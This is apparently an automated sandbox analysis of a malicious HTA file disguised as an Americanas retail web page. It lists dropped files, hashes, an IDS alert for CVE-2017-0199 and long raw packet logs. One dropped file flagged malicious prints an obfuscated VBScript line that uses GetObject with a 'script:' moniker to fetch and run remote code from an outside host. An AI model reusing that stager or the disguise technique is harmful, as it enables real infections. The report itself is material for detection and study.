                                                                                                                                                                                                                                    Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[232],{3126:(t,e,n)=>{"use strict";n.d(e,{Z:()=>o});var r,i=n(32735);function a(){return(a=Object.assign?Object.assign.bind():function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(t[r]=n[r])}return t}).apply(this,arguments)}const o=function(t){return i.createElement("svg",a({fill:"#F80032",width:25,height:25,viewBox:"0 0 25 25",xmlns:"http://www.w3.org/2000/svg"},t),r||(r=i.createElement("path",{d:"M7.897 4.658a.762.762 0 011.077-1.077l8.38 8.38.001.001a.762.762 0 010 1.077L8.974 21.42a.762.762 0 11-1.077-1.077l7.842-7.842-7.842-7.843z"})))}},45750:(t,e,n)=>{var r=n(85973),i=n(28148),a=n(78746),o=Math.max,s=Math.min;t.exports=function(t,e,n){var l,c,u,f,h,d,p=0,m=!1,v=!1,g=!0;if("function"!=typeof t)throw new TypeError("Expected a function");function w(e){var n=l,r=c;return l=c=void 0,p=e,f=t.apply(r,n)}function y(t){return p=t,h=setTimeout
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (32138)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):105873
                                                                                                                                                                                                                                    Entropy (8bit):5.604393260955423
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:NZOfIApQCjPBY7crnrhtnywq9Av6LJ0KOPqrCvBL:WIAB4dYvBL
                                                                                                                                                                                                                                    MD5:E67C2F1DDCC80BB010E175B9B92BB31D
                                                                                                                                                                                                                                    SHA1:FC57A350D8AF8D73407E0C28E397C3F755F5E717
                                                                                                                                                                                                                                    SHA-256:5EB74089E4D7F5DFB621DE0855FA968C2CC29DEDA8D53DD6751D93D684B3B2CB
                                                                                                                                                                                                                                    SHA-512:80F914063925FDD90333DE9858434C19B981FBB0A65028880A6C0DDEBD86F38C5998557A3B0940A2D09A5F44F8A27394AE53C7DFD138408092F1E40FC8F0F0E6
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:(function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},u=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=function(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in t?f=t:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))brea
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):285
                                                                                                                                                                                                                                    Entropy (8bit):3.0648219798227685
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:nStlVlPq4VVO1VMaRq8V8BGaTu0MjDtq+EtUhhk//A/l9ms8:cAVMgVPEudjDtqRUhh/l9ms8
                                                                                                                                                                                                                                    MD5:2E85899818427B96F57DB55DD05D06A7
                                                                                                                                                                                                                                    SHA1:97DD1C541DF27AB842557955390AD1D48A204706
                                                                                                                                                                                                                                    SHA-256:3B8BFA505FC51242D5B2452E3BCE6C89DA12923FB0AD61F00EE72100C9CB3CD0
                                                                                                                                                                                                                                    SHA-512:3C57FDCE71D42124BA28ADBDCCFE87BE7DCE26950BE32935ECF4A4AA54E5AFA9AFD46F1EA66E5EABC56956465E65377E4976EDD563FDFCA9CE14AB551A5CC0E4
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:......JFIF.............C.rOVdVGrd]d.yr......................................................C.y.........................................................................."............................................................................................................?......
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (26979)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):27033
                                                                                                                                                                                                                                    Entropy (8bit):5.157851706922435
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:UnlK9NO+IkZlcTj4wgUUvxRwWgaQDEvyIj:4K9NFqHlVERwbLE6I
                                                                                                                                                                                                                                    MD5:4576D0CD7F770854C85A5801414B844B
                                                                                                                                                                                                                                    SHA1:1D8572F543C6C17E7B3AAECBF93ADB272758A237
                                                                                                                                                                                                                                    SHA-256:5C04D2D67961103EC35E526816B9FB57165F949640652607C39781DA8D8BFD77
                                                                                                                                                                                                                                    SHA-512:44F763E6959056C93EC70B445A78C28E5B4F2E2689F01EC44482F3DF1A3D858148775F1A973A64DE474A5A4905DD96A636F1D292DD8CA73FD6B05B164FE829B2
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:var client;(()=>{var a={79382:(a,e,o)=>{"IntersectionObserver"in window?o.e(2078).then(o.bind(o,72078)):o.e(7946).then(o.t.bind(o,47946,23)).then((function(){o.e(2078).then(o.bind(o,72078))}))},59325:(a,e,o)=>{"use strict";o.r(e);o(79382)}},e={};function o(c){var i=e[c];if(void 0!==i)return i.exports;var t=e[c]={id:c,loaded:!1,exports:{}};return a[c].call(t.exports,t,t.exports,o),t.loaded=!0,t.exports}o.m=a,o.n=a=>{var e=a&&a.__esModule?()=>a.default:()=>a;return o.d(e,{a:e}),e},(()=>{var a,e=Object.getPrototypeOf?a=>Object.getPrototypeOf(a):a=>a.__proto__;o.t=function(c,i){if(1&i&&(c=this(c)),8&i)return c;if("object"===typeof c&&c){if(4&i&&c.__esModule)return c;if(16&i&&"function"===typeof c.then)return c}var t=Object.create(null);o.r(t);var l={};a=a||[null,e({}),e([]),e(e)];for(var r=2&i&&c;"object"==typeof r&&!~a.indexOf(r);r=e(r))Object.getOwnPropertyNames(r).forEach(a=>l[a]=()=>c[a]);return l.default=()=>c,o.d(t,l),t}})(),o.d=(a,e)=>{for(var c in e)o.o(e,c)&&!o.o(a,c)&&Object.defi
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):293029
                                                                                                                                                                                                                                    Entropy (8bit):7.997376111410533
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:6144:BXRs+CdR/dKYPaTT1wCbFSp8d2hNRb8+YAsGGjLsp:0dVQhTT1w+FSHNF8+YAs8
                                                                                                                                                                                                                                    MD5:13A94D342C713C85222FED81CD4A3D54
                                                                                                                                                                                                                                    SHA1:4876993C9404CE19EBC225F88A30359A0C1CFDE9
                                                                                                                                                                                                                                    SHA-256:24B644D1A837FCE5307C990DC576072A226B68085A2D86059EBACBA596F60D67
                                                                                                                                                                                                                                    SHA-512:001C0BA2A5EB85F51BD19C37812B6BF635869E8FF1F2DC57984D4F8E1BF159008A480899D11E9E5D631EFB1ED45422EE29572DC1FA6E880B65B31C022B320FC9
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..i.$.u..;7........6H.A..)qH....FhR.9f,Q...[..%.!J.Z8.....7.G.8..GThH.G...P.f.b.......P....@.k7...~KU.=.ps....z....T...{.9w.......&e.d....p.4.]~N.."..e....Bq....K.o..H`,W<0}ap.O....Uk.....m.K...X....)....xIK....U..4o..e,i.Zh^o...:.Z.J3....j....y....)..z.{...o...t%.4.>.>1.D..FW..,\i.]a.+....'...#,S9u..).,..*.m.....G....w...y..+.gR...]....;.M.......V..t......Y.O....$..Z.#{z.......%..."~..Ji:..":.(U...Q.S2_$6 ... =a.JHpa....?.c.E-..P.......'q.#.mW_GW...h...TS;T..j.ze......"..{..VXa..J....]..L..'....m.. ..Y1....?'...vU.#..E^k.....v...b.........Tu.*.?Z...q.....f...)D..M.!!.I..!.......<u...i...1.$.G.r1 F@.pKA.....;.P...Dnpm..*.l.,.7.;.,/oee.D...^.W.YI.y....@k"k.....a.l...7..?..2....W&...Qro..dY.Y....^.q..........I...@3;..eM.DNS.-.......fYMV...c..u.(....Jo.6.y.UK..-%....HrZ....r".q.}...U...Q.#..w...cr..P.fLBsT...m.do..Y<...I.|E...E...zD..MQ.o..,.....U......#..{.T.......y..r.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                    Size (bytes):271
                                                                                                                                                                                                                                    Entropy (8bit):5.250152930854115
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:kD7j1oPayjqEWXil1+UkTdGk69ukJyrUXHht8XOcHv5n:k3j0jqEWMMv5ksr4hov5
                                                                                                                                                                                                                                    MD5:05F88C21A3B62133641D007516237440
                                                                                                                                                                                                                                    SHA1:8932D42C5ABC16091EE9D1F5CC99BBF992E9552F
                                                                                                                                                                                                                                    SHA-256:2F0A789567FA67B2429FA528EC95CE9FCADEB9DF1B78636B2BBBD6F51EC8EF26
                                                                                                                                                                                                                                    SHA-512:97BFFDD1AC98D5F79112E10F67F1A6BC64F79FD18B448199DECCA6F8C722FECCE719725C0B8A5809E878AFA929BE61C630E35F3F429B9FE58C11848518E3A6E2
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetObject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")
                                                                                                                                                                                                                                    File type:HTML document, Unicode text, UTF-8 text, with very long lines (1835)
                                                                                                                                                                                                                                    Entropy (8bit):5.614851252612375
                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                      File name:Archivo-PxFkiLTWYG-23122024095010.hta
                                                                                                                                                                                                                                      File size:442'101 bytes
                                                                                                                                                                                                                                      MD5:74903ec7a266a9d8d2c5d96d8b9b4965
                                                                                                                                                                                                                                      SHA1:c425469eaa1d275f7a30314298a665fc553d5b33
                                                                                                                                                                                                                                      SHA256:78df7fdcf6d5a0e70aee7d295f976dabb99c5dd1327fcb82fea548e578897f78
                                                                                                                                                                                                                                      SHA512:dbab53d93608b8c5d05fe32c9387396006552ed328e83908b886d921e59a69074b4ae8cbe3d80ab93b50e65a7c1ed087645b58f26a5f5c38514d6b051c72b34e
                                                                                                                                                                                                                                      SSDEEP:3072:0Al6oGlpW5P1VZuSLWlUmHpyqOOEgGmlO1gE8MCRCU65ZRoWqfx:ll6vpW59VISL+RZZrlOu
                                                                                                                                                                                                                                      TLSH:D194F8361698297E434743CDBC5BBB1662CB605BC5894AE8CAFCCF1E87A9CDE131160D
                                                                                                                                                                                                                                      File Content Preview:... <!DOCTYPE html>. <html lang="pt-BR">. <head>. <title data-react-helmet="true">Americanas - Passou, cestou :)</title>. <meta http-equiv="X-UA-Compatible" content="IE=edge" /> . <meta name="viewport" content="width=device-width, initial-scal
                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                      2024-12-23T10:41:25.563156+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.244983716.12.2.36443TCP
                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:00.918124914 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:00.918159962 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:00.918241978 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:00.919303894 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:00.919326067 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:02.626611948 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:02.626686096 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:02.628376007 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:02.628381968 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:02.629976988 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:02.630086899 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:02.631788969 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:02.631881952 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:02.632172108 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:02.632183075 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:02.632500887 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:02.633948088 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:02.679333925 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.434497118 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.434631109 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.434722900 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.434731007 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.434753895 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.434803009 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.434803009 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.434849024 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.434961081 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.434968948 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.435074091 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.447638988 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.448426962 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.448441982 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.448622942 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.452085972 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.452183962 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.461401939 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.461456060 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.553814888 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.553962946 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.553975105 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.554024935 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.557801962 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.558134079 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.558141947 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.558186054 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.626135111 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.628412008 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.629848003 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.629906893 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.631172895 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.631340027 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.638937950 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.640409946 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.642347097 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.643987894 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.648067951 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.648380995 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.656128883 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.656380892 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.659982920 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.660062075 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.669845104 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.672374010 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.673588991 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.675132990 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.683482885 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.684398890 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.686300039 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.688370943 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.697040081 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.699472904 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.699907064 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.700117111 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.709407091 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.712379932 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.712388992 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.716403008 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.721668959 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.724256039 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.724528074 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.728195906 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.734139919 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.736428022 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.736768007 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.738792896 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.746114969 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.748378038 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.748384953 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.749890089 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.758483887 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.760418892 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.760426044 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.764374971 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.770653009 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.772372007 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.772382021 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.776381969 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.817856073 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.817980051 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.819164038 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.819232941 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.819277048 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.819329023 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.824173927 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.824290991 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.841111898 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.841211081 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.841223955 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.844391108 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.849570990 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.849649906 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.849694014 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.852382898 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.852396011 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.853847027 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.853866100 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.854191065 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.856642008 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.856888056 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.864975929 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.865428925 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.866861105 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.868367910 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.874862909 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.875777960 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.876069069 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.876307964 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.888040066 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.888202906 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.889197111 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.889298916 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.896157980 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.896229982 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.897407055 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.897504091 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.906892061 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.906960964 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.906968117 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.907016993 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.917542934 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.917603970 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.917642117 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.917685032 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.927949905 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.928364038 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.928374052 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.928457975 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.938325882 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.939414978 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.939424992 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.939491987 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.947961092 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.948013067 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.948050022 CET44349794172.217.19.194192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.948123932 CET49794443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:03.957185030 CET44349794172.217.19.194192.168.2.24
